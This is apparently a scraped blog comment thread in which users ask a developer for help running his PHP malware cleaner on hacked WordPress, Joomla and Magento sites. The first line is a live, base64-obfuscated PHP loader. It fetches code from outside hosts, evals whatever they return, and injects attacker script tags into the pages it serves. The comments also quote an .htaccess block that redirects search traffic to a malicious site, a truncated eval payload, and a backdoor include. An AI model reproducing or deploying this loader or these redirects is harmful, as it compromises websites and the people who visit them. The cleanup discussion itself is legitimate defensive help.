    eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29udGVudD0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZzb2Nrb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeXNvY2tldF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICcnO30gIGZ1bmN0aW9uIHRyeWN1cmxfNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYnVmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9wZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTt9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9ICBmdW5jdGlvbiB0cnlmc29ja29wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QHBhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEkZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7ZndyaXRlKCRmLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCFmZW9mKCRmKSl7JGJ1Zi49ZnJlYWQoJGYsMTAwMDApO31mY2xvc2UoJGYpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5c29ja2V0Xzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ3NvY2tldF9jcmVhdGUnKT09PWZhbHNlKXJldHVybiBmYWxzZTskcD1AcGFyc2VfdXJsKCR1cmwpOyRob3N0PSRwWydob3N0J107JHVyaT0kcFsncGF0aCddLic/Jy4kcFsncXVlcnknXTskaXAxPUBnZXRob3N0YnluYW1lKCRob3N0KTskaXAyPUBsb25nMmlwKEBpcDJsb25nKCRpcDEpKTsgaWYgKCRpcDEhPSRpcDIpcmV0dXJuIGZhbHNlOyRzb2NrPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7aWYgKCFAc29ja2V0X2Nvbm5lY3QoJHNvY2ssJGlwMSw4MCkpe0Bzb2NrZXRfY2xvc2UoJHNvY2spO3JldHVybiBmYWxzZTt9JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7c29ja2V0X3dyaXRlKCRzb2NrLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCR0PXNvY2tldF9yZWFkKCRzb2NrLDEwMDAwKSl7JGJ1Zi49JHQ7fUBzb2NrZXRfY2xvc2UoJHNvY2spO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdXBkYXRlX3Rkc19maWxlXzc3NygkdGRzZmlsZSl7JGFjdHVhbDE9JF9TRVJWRVJbJ3NfYTEnXTskYWN0dWFsMj0kX1NFUlZFUlsnc19hMiddOyR2YWw9Z2V0X3Rkc183NzcoJGFjdHVhbDEpO2lmICgkdmFsPT0iIikkdmFsPWdldF90ZHNfNzc3KCRhY3R1YWwyKTskZj1AZm9wZW4oJHRkc2ZpbGUsInciKTtpZiAoJGYpe0Bmd3JpdGUoJGYsJHZhbCk7QGZjbG9zZSgkZik7fWlmIChzdHJzdHIoJHZhbCwifHx8Q09ERXx8fCIpKXtsaXN0KCR2YWwsJGNvZGUpPWV4cGxvZGUoInx8fENPREV8fHwiLCR2YWwpO2V2YWwoYmFzZTY0X2RlY29kZSgkY29kZSkpO31yZXR1cm4gJHZhbDt9ICBmdW5jdGlvbiBnZXRfYWN0dWFsX3Rkc183NzcoKXskZGVmYXVsdGRvbWFpbj0kX1NFUlZFUlsnc19kMSddOyRkaXI9JF9TRVJWRVJbJ3NfcDEnXTskdGRzZmlsZT0kZGlyLiJsb2cxLnR4dCI7aWYgKEBmaWxlX2V4aXN0cygkdGRzZmlsZSkpeyRtdGltZT1AZmlsZW10aW1lKCR0ZHNmaWxlKTskY3RpbWU9dGltZSgpLSRtdGltZTtpZiAoJGN0aW1lPiRfU0VSVkVSWydzX3QxJ10peyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO31lbHNleyRjb250ZW50PUBmaWxlX2dldF9jb250ZW50cygkdGRzZmlsZSk7fX1lbHNleyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO30kdGRzPUBleHBsb2RlKCJcbiIsJGNvbnRlbnQpOyRjPUBjb3VudCgkdGRzKSswOyR1cmw9JGRlZmF1bHRkb21haW47aWYgKCRjPjEpeyR1cmw9dHJpbSgkdGRzW210X3JhbmQoMCwkYy0yKV0pO31yZXR1cm4gJHVybDt9ICBmdW5jdGlvbiBpc19tYWNfNzc3KCR1YSl7JG1hYz0wO2lmIChzdHJpc3RyKCR1YSwibWFjIil8fHN0cmlzdHIoJHVhLCJzYWZhcmkiKSlpZiAoKCFzdHJpc3RyKCR1YSwid2luZG93cyIpKSYmKCFzdHJpc3RyKCR1YSwiaXBob25lIikpKSRtYWM9MTtyZXR1cm4gJG1hYzt9ICBmdW5jdGlvbiBpc19tc2llXzc3NygkdWEpeyRtc2llPTA7aWYgKHN0cmlzdHIoJHVhLCJNU0lFIDYiKXx8c3RyaXN0cigkdWEsIk1TSUUgNyIpfHxzdHJpc3RyKCR1YSwiTVNJRSA4Iil8fHN0cmlzdHIoJHVhLCJNU0lFIDkiKSkkbXNpZT0xO3JldHVybiAkbXNpZTt9ICAgIGZ1bmN0aW9uIHNldHVwX2dsb2JhbHNfNzc3KCl7JHJ6PSRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0uIi8ubG9ncy8iOyRtej0iL3RtcC8iO2lmICghaXNfZGlyKCRyeikpe0Bta2RpcigkcnopO2lmIChpc19kaXIoJHJ6KSl7JG16PSRyejt9ZWxzZXskcno9JF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdLiIvLmxvZ3MvIjtpZiAoIWlzX2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoaXNfZGlyKCRyeikpeyRtej0kcno7fX1lbHNleyRtej0kcno7fX19ZWxzZXskbXo9JHJ6O30kYm90PTA7JHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZiAoc3RyaXN0cigkdWEsIm1zbmJvdCIpfHxzdHJpc3RyKCR1YSwiWWFob28iKSkkYm90PTE7aWYgKHN0cmlzdHIoJHVhLCJiaW5nYm90Iil8fHN0cmlzdHIoJHVhLCJnb29nbGUiKSkkYm90PTE7JG1zaWU9MDtpZiAoaXNfbXNpZV83NzcoJHVhKSkkbXNpZT0xOyRtYWM9MDtpZiAoaXNfbWFjXzc3NygkdWEpKSRtYWM9MTtpZiAoKCRtc2llPT0wKSYmKCRtYWM9PTApKSRib3Q9MTsgIGdsb2JhbCAkX1NFUlZFUjsgICAgJF9TRVJWRVJbJ3NfcDEnXT0kbXo7ICAkX1NFUlZFUlsnc19iMSddPSRib3Q7ICAkX1NFUlZFUlsnc190MSddPTEyMDA7ICAkX1NFUlZFUlsnc19kMSddPSJodHRwOi8vc3dlZXBzdGFrZXNhbmRjb250ZXN0c2RvLmNvbS8iOyAgJGQ9Jz9kPScudXJsZW5jb2RlKCRfU0VSVkVSWyJIVFRQX0hPU1QiXSkuIiZwPSIudXJsZW5jb2RlKCRfU0VSVkVSWyJQSFBfU0VMRiJdKS4iJmE9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKTsgICRfU0VSVkVSWydzX2ExJ109J2h0dHA6Ly93d3cubGlseXBvcGhpbHlwb3AuY29tL2dfbG9hZC5waHAnLiRkOyAgJF9TRVJWRVJbJ3NfYTInXT0naHR0cDovL3d3dy5sb2x5cG9waG9seXBvcC5jb20vZ19sb2FkLnBocCcuJGQ7ICAkX1NFUlZFUlsnc19zY3JpcHQnXT0ibW0ucGhwP2Q9MSI7ICB9ICAgICAgc2V0dXBfZ2xvYmFsc183NzcoKTsgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ21sXzc3NycpKXsgIGZ1bmN0aW9uIGdtbF83NzcoKXsgICAgJHJfc3RyaW5nXzc3Nz0nJzsgIGlmICgkX1NFUlZFUlsnc19iMSddPT0wKSRyX3N0cmluZ183Nzc9JzxzY3JpcHQgc3JjPSInLmdldF9hY3R1YWxfdGRzXzc3NygpLiRfU0VSVkVSWydzX3NjcmlwdCddLiciPjwvc2NyaXB0Pic7ICByZXR1cm4gJHJfc3RyaW5nXzc3NzsgIH0gIH0gICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZWl0JykpeyAgZnVuY3Rpb24gZ3pkZWNvZGVpdCgkZGVjb2RlKXsgICR0PUBvcmQoQHN1YnN0cigkZGVjb2RlLDMsMSkpOyAgJHN0YXJ0PTEwOyAgJHY9MDsgIGlmKCR0JjQpeyAgJHN0cj1AdW5wYWNrKCd2JyxzdWJzdHIoJGRlY29kZSwxMCwyKSk7ICAkc3RyPSRzdHJbMV07ICAkc3RhcnQrPTIrJHN0cjsgIH0gIGlmKCR0JjgpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYoJHQmMTYpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYoJHQmMil7ICAkc3RhcnQrPTI7ICB9ICAkcmV0PUBnemluZmxhdGUoQHN1YnN0cigkZGVjb2RlLCRzdGFydCkpOyAgaWYoJHJldD09PUZBTFNFKXsgICRyZXQ9JGRlY29kZTsgIH0gIHJldHVybiAkcmV0OyAgfSAgfSAgZnVuY3Rpb24gbXJvYmgoJGNvbnRlbnQpeyAgQEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgJGRlY29kZWRfY29udGVudD1nemRlY29kZWl0KCRjb250ZW50KTsgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJGRlY29kZWRfY29udGVudCkpeyAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sXzc3NygpLiJcbiIuJyQxJywkZGVjb2RlZF9jb250ZW50KTsgIH1lbHNleyAgcmV0dXJuICRkZWNvZGVkX2NvbnRlbnQuZ21sXzc3NygpOyAgfSAgfSAgb2Jfc3RhcnQoJ21yb2JoJyk7ICB9ICB9"));
  27. Pingback: Not again... but maybe "never" again? - noted

  28. Dan says:

    Hi Paolo,

    I installed the “cleaner-cli_2.4″ file into my root domain. What is the next step? It seems I should do more than just drop it in there. Please help.

    All my .htaccess files for all my domains are full of “rewrites.” There seems to be a malicious script running somewhere. Every time I delete the “rewrite code” in these .htaccess files, they come back within an hour.

    I’m hoping that the “cleaner-cli_2.4″ file can clean up the hidden code. I just need to understand how to properly use it.

    Thanks!

    Dan

    • Paolo says:

      Hello Dan,

      Run it using shell terminal with this code:

      $ time php cleaner-cli_2.4.php 2>&1 >> cleaner_log

      I hope that helps. Just saw your site, you’ve been block because of the malware.

      If the script didn’t removed the javascript malicious code let me know.

      Paolo

  29. Dan says:

    What is shell terminal exactly?

    • Paolo says:

      It is a command-line user interface to the server. It is used to connect and perform task to the server
      by typing commands. It is equivalent to DOS environment in Windows.
      https://ccrma.stanford.edu/guides/planetccrma/terminal.html

      Most hosting company provides shell access, if in case not, you may use Cleaner HTTP version.
      Just simply upload the file to your server and run it using your browser. See the instructions
      above.

      Thanks let me know.

  30. Chris says:

    Paolo,

    Should this script work for http:// bannortimqimulta.ru/industry/index .php ? I just installed the script in my root folder and scanned the site but they bad code is still in all of the .htaccess files.

    Thanks!

  31. Dan says:

    Bluehost gives me shell access to use with my favorite SSH Client. What SSH Client do you recommend, and where can I get it?

  32. Happy Visitor says:

    Where is your donate link? Do you have a PayPal account? I really appreciate this script and would like to send you a thank you.

    • Paolo says:

      Wow… Thank you Happy Visitor. :D I really appreciate it. I never thought about this one. Thanks for encouraging me to create a better Malware Cleaner program. Big big thanks again. :D

      Have a great day! :D

  33. Dan says:

    Paolo,

    Concerning puTTY…

    After connecting with my username and hostname, I’m then prompted to enter my password, but it will not allow me to type it in. It will not allow ANY characters to be typed. You ever had trouble with this? Maybe there’s a setting I’m missing.

    Dan

  34. Ricardo says:

    Thanks, this solution was great!!

    It would be even better if you would have the same solution for magento. I got malicious code on wordpress and magento at the same time, but magento seems to be a little more pain in the ass to resolve..

    • Paolo says:

      I am sorry but this works on Magento as well or any php program. Just run the cleaner script. :) Sorry about that.

      Please make sure you create a backup of your files before you run the cleaner script, so that you can easily recover
      the files if something goes wrong. Let me know what I can help.

      Paolo

      • Ricardo says:

        Thanks Paolo, it worked perfectly on magento as well.

        Now I found this code at the bottom of my wordpress website and I want to remove from all .php files, how do I do this?

        Thanks

      • Ricardo says:

        For some reason it didn’t show the proper code that I need to remove, which is:

  35. I am so not technical, but I can’t afford help. My blogs are messed up. I’ve got the bizarre dashboard going on for all my blogs. I found your site and I am trying to run the script, but I may not have done it right. Here’s what I did:

    I downloaded the file, extracted it, uploaded it to my http://www.melissathinks.com folder via ftp. Then I went to my browser (chrome) and typed http://www.melissathinks.com/cleaner_2.4.php. The little circle spun for a really long time and then I got a 505 error.

    Did I so something wrong?

    Oh and thank you soooooo much for creating this! I have spent so many hours trying to figure out what the hell happened and trying to fix it and I literally ended up crying :-(

    • Paolo says:

      Oh! don’t worry Melissa, I’m here to help you. We’ll fix your blog.

      Actually, you did it right. I’m not really sure why the page throws 500 Internal Server error, maybe it’s because of your hosting
      php.ini configuration.

      Can you try to run my malware scanner (download and upload it to your server same thing you did on cleaner_2.4.php):
      http://www.php-beginners.com/wordpress-hack-malware-scanner.html

      and please send the scan result to info@php-beginners.com
      you can also add me on skype: oo70vd
      so that we can resolve your problem immediately.

      Let me know.

      Paolo

      • Paolo,
        You are right, it did work!!! I’m such a doofus. Last night before I went to sleep, way later than normal :-( I was reading on my ipad and I decided to take one more look at my destroyed dashboard and guess what? It looked fine! So this morning I got up all excited and went to check it out on my laptop, still no good. I cleared cache, still no good. Used firefox, still no good.

        So then I downloaded safari and it looked great!

        I’m haven’t learned a lot of techy stuff, but I do love the scientific method. So I sat over breakfast wondering why apple products would be different and couldn’t come up with a reason other than they had NEVER accessed my dashboard before.

        So I went under the hood in chrome and instead of just telling it to clear cache, I cleared everything, passwords and all. And guess what?????

        My dashboard looks normal again!!! I did the same on firefox and it looks great there too. I don’t really give a crap about IE…I try never to use that browser :-)

        I wish I had found your blog so much earlier in the day yesterday, I would have saved so many tears :-) I’m heading over to your donate button now and I am going back to every forum that I went to yesterday to tell them about your amazing script!!!!

        Thank you from the bottom of my heart.

        Melissa

        • Paolo says:

          Thanks Melissa, that’s really nice to hear that your site is back normal again. You’re site looks great! Thank you also Melissa for the donation, big big thanks. :D

          If you have problem of your site just let me know.

          Thanks again.

          Paolo :)

  36. Hi Admin
    Absolutely amazing code. Used that. Worked perfectly. Thank You so much. Please reply me on sagar@clubhack.com & chmag.in We will love to post your article on our magazine ClubHack Magazine.

    Thank You Again.

    Sagar Nangare
    ClubHack

  37. Pingback: Hacked Off | Inner Quests

  38. Lekshmi says:

    Thanks for your help. We have downloaded cleaner_2.4 file and executed via browser from root folder ,which removed all the virus script. I have edited some thing on that code to change file execute permission.just added this code chmod($dir.”/”.$file,0444);

  39. Dan says:

    Hey guys,

    Maybe I need to add this code too… chmod($dir.”/”.$file,0444);

    When I’m running the cleaner_2.4 file, my page doesn’t come up. You can try it here… http://www.dbdrumtips.com/cleaner_2.4.php

    Where exactly in the cleaner_2.4.php file do I need to place chmod($dir.”/”.$file,0444);

    Thanks!

    Dan

  40. Dan says:

    Paolo,

    I can proceed to the root domain with no trouble. It’s just that when I try to proceed with http://www.dbdrumtips.com/cleaner_2.4.php is when it just will not open. I just get, “Website Offline, No Cached Version Available.”

    I tried the CLI version, but puTTY would not let me type in my password.

    What do you advise?

    Thanks!

    Dan

  41. Dan says:

    Paolo,

    I can proceed to dbdrumtips.com with no difficulty. It’s when I proceed to to dbdrumtips.com/cleaner_2.4.php is when I have trouble. I get “Website Offline, No Cached Version Available.”

    I tried the CLI version, but puTTY would not let me type in my password. It just seems to freeze.

    Your cleaning tools would be a dream come true if I could just get them to work for me. Can you advise me further? I appreciate your help!

    Dan

  42. Don Reed says:

    If I upload the cleaner into a specific directory (not the root) will it just clean the files in that directory?
    I wanted to test it before applying to the whole site.
    I have an infected Joomla site. I am assuming it will work for this.

    Thanks

    • Paolo says:

      Yes that’s right, it will just clean all the files in that director.. It works well on Joomla too. Make sure you backup your files before you run the script.
      Just to make sure. :)

      Let me know.

  43. Rodrigo says:

    hello, my site was wordpres with this problem, I backed up and everything, fixed the problem of the virus, but now the enrtar the site is by IE misaligned left, since I updated wordpress, the thema, and put some files up as css, and to no avail, please help me. in other browsers like chrome, firefox normal works

    http://www.clubdofitness.com.br

  44. Rodrigo says:

    hello, my site was wordpres with this problem, I backed up and everything, fixed the problem of the virus, but now the enrtar the site is by IE misaligned left, since I updated wordpress, the thema, and put some files up as css, and to no avail, please help me. in other browsers like chrome, firefox works normally, the lightbox it also only works in IE as in others not
    http://www.clubdofitness.com.br

    • Paolo says:

      Hello Rodrigo,

      I have checked your site, you have a great site, they really look great on FF 10.0.2 and chrome 17.0.963.56 m but on IE 8 it’s not.
      Don’t worry will fix that asap. Keep you posted.

      Paolo

    • Paolo says:

      Hi Rodrigo,

      Wow, this is really difficult to locate this type of error.
      Actually, this is my first time.
      http://www.php-beginners.com/images/2012-03-02_2201.png

      I think the file is:
      /wp-content/themes/fitness/header.php

      Just modify the file. The <!DOCTYPE html> looks like a normal less than (<) symbol but the (<) is not. That’s why you have to replace it by typing less than (<).

      Let me know, maybe I’m wrong, but it works fine on my browser.

      Regards,
      Paolo

  45. Victoria says:

    I LOVE YOU! Thanks for sharing this with the world. It has saved me tons of time :-)
    I’m going straight to the “Donate” button, you deserve it!!

    Will you consider keeping the cleaner updated? :-) )

    • Paolo says:

      Big big Thanks Victoria, I received your donation already. Thanks again.
      Yes, I will keep this updated.

      Thank you again Victoria. Have a great day!

      Paolo :)

  46. Dan says:

    Paolo,

    I’ve added you on Skype, and sent you a message.

    Dan

  47. Rena says:

    This was the code that was in all of my .php files
    Unfortunately, I started manually removing it in Dreamweaver, before I found your cleaner…I just ran it and I’m hoping it worked! I have to wait for my site to go back online ( I took it down, so the malware wouldn’t mess with anyone else’s system)
    Thanks so much!
    ~Rena~

    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6c..."));
    • Paolo says:

      Hi Rena,

      Cleaner script can totally removed that malware code.
      This malware codes redirects your visitors to another site (costabrava.bee.pl)

      Hoped it removed already. Let me know.

      Thanks,
      Paolo :)

      • Rena says:

        Hey Paolo!
        It just did it again…almost a month later (worst.day.ever.)…I’m gonna run the scanner again! It worked last time :) Then I’m going to change all my log-ins, etc.

        Thank You…Again, hehe,
        ~Rena~

  48. Excellent weblog here! Additionally your site quite a bit up very fast! What host are you the usage of? Can I get your affiliate link on your host? I desire my web site loaded up as fast as yours lol

  49. haris says:

    hello sir..

    i did scan using cleaner_2.4.php and it show 0 Found Infected Files..

    however when i scan my website using sucuri.net it show Site infected with malware.

    and how to use Cleaner CLI 2.4 with command prompt..

    did i need to open cmd.exe and insert the code that you gave above or i extract the zip file and open with the cmd and insert the code?

    thank you in advance.

    • Paolo says:

      I see, when I click your site from google search result
      it redirects me to the hacker’s web page – (Do not visit the site: massage-pool.ru/mysave/index.php). This leads to losing visitors to your site and bad effect your SEO works. We need to stop this attack asap.

      Is it okay if you’ll send to me your .htaccess and index.php files to info@php-beginners.com? I will check it and see what I can do to remove it.

      Thanks. Let me know.

      Paolo

      • haris says:

        i already send you the htaccess and index.php file..please check your email from goodigi2011@gmail.com

        thank you again.

        • Paolo says:

          Hello Haris,

          I got your email. Your “.htaccess” file is infected, you have to delete the code from line 1-16.
          The malicious code that was inserted in your “.htaccess” redirects your visitors to hackers site (massage-pool.ru)

          Below is the malicious code. You have to delete these line of codes.

          <IfModule mod_rewrite.c>
          RewriteEngine On
          RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
          RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
          RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
          RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
          </IfModule>

          Let me know.

          Paolo

          • haris says:

            thank you for your reply..

            i did already delete all that before..but it appear again after an hour….doesn’t matter what i do..it will appear again at htaccess….

          • Hello Paolo,

            I’m having the exact same situation. The site is redirecting to the same massage-pool. I’m deleting the lines from the .htaccess file but like haris, they come back after an hour or so.

            I have only run the cleaner via the website option. When I run the cleaner via the CLI it says “could not open input file.”

            Anything you can do would be great. We’re going on 24 hours of infection and I can’t get it out.

            Take care,

            - Mark

          • Paolo says:

            Hi Mark and Haris,

            We need to figure out where and what file is writing back the malware code again.

            Here’s what we are going to do. Can you run a malware scan on your site. Just download and run the file (see link below) and send the scan result to info@php-beginners.com

            http://www.php-beginners.com/wordpress-hack-malware-scanner.html

            Let me know. Thanks.

            Paolo

  50. This script is working very well. Thank you Paolo you saved me.

  51. jm says:

    can we run this script from a web browser?

  52. Pingback: Tired of hackers « MichaelKerley.net

  53. dewluca says:

    I ran the browser version on a couple of sites a few days ago and it worked great!
    Unfortunately, I ran into time-out problems on my main site, so today I tried running from terminal ssh. After a while I was worried it wasn’t working, so I aborted . . . and when I checked the cleaner_log all I see is a list of folders (not the list of files I got when I ran the browser version). And they were folders in the NEW WP install I thought was clean! . . . it never got to the .old and .HACKED folders where I know there are problems.
    Is this just a list of what it checked (rather than what it fixed)?
    If I let it run will I get a list of what it fixed?
    or is there a way to run it on specific subfolders?
    Thanks for your great work!

    • Paolo says:

      Hello Dewluca,

      CLI version is more faster than Browser version of cleaner, that’s the difference. The list of directories that was in cleaner_log are directories that were visited/checked by the cleaner script. If the cleaner saw a malware / malicious script in a certain file it will list that file on clear_log.

      You can run the cleaner on a certain directory, just by placing the cleaner file on that directory, example, /www/php-beginners.com/wp-content/cleaner_2.4.php, it will scan all the files inside /www/php-beginners.com/wp-content/ directory and then clean those files that has malware/malicious codes.

      Thanks for using cleaner script. Just Let me know if you still have problems. Thanks.

      Paolo

  54. Alex says:

    Is this script specific to wordpress? I have a bunch of concrete5 sites and a zen cart site that has been infected by the same hack.

    • Paolo says:

      Hello Alex,

      This is works well on all php programs. WordPress, Joomla, Magento, and etc…
      But don’t forget to backup your files first before running the cleaner.

      Let me know how it goes. Thanks.

      Paolo

  55. Kelly says:

    I’m so happy I found this. I am having the same issue (WordPress!) I could not get the cleaner script to run in my browser (kept getting a 500 error), but I dusted off my DOS skills and ran in PuTTY. Now I have a log, but I have no idea what it means…it looks like all the files it cleaned were in an old WP folder that shouldn’t be accessed by more current site. Any thoughts?

  56. Heya i am for the primary time here. I came across this board and I to find It truly useful & it helped me out a lot. I’m hoping to provide something again and aid others like you aided me.

  57. Mark says:

    Hey Paulo,

    So glad I found your site. One of our WordPress sites got hacked just over a week ago, it was redirecting to another site. I noticed that the file on our server had been modified and inserted with some base64 code, so I went through and replaced all the files with ones from my last back up. We also changed all passwords etc but were still getting the problem.

    Anyway I ran your cleaner script and it found a load of files I’d missed and thankfully its all fixed now, thank you so much. I’ve now gone back and made sure our WordPress and Plugins are now fully up-to-date and that we have strong passwords.

    thanks again :)

    • Paolo says:

      Hello Mark, Awesome, thanks. I’m glad that it worked well for you. Please do create a backup of your clean files.

      Have a great day!

      Paolo :)

  58. dobol says:

    Hi…
    mine as well got infected, try to find the culprit with decrypting the gzinflate, and lastly got this code

    if(function_exists(‘ob_start’)&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']=’/home/path/to/mydomain/cp/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/ec5.php’;if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists(‘gml’)&&function_exists(‘dgobh’)){ob_start(‘dgobh’);}}}

    Do you guys know, what this code intent to?

    • Paolo says:

      Hello Dobol,

      That malware simple calls another file to execute.
      /home/path/to/mydomain/cp/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/ec5.php

      I think you have tinymce vulnerability issue. hmmm.. but I’m not really sure yet.
      Can you send me the infected file (where the eval(gzinflate(…)) code is in) and ../inlinepopups/skins/clearlooks2/img/ec5.php

      I’ll check them, and see what I can do.

      Thanks.

      Paolo :)

  59. dobol says:

    Hi Paolo..
    Thanks for your response,
    Here is the links to the files
    http://www.mediafire.com/download.php?c2k1xj425oqcjo3

    both ec5.php,the decrypted of ec5.php and infected file.

  60. Jay says:

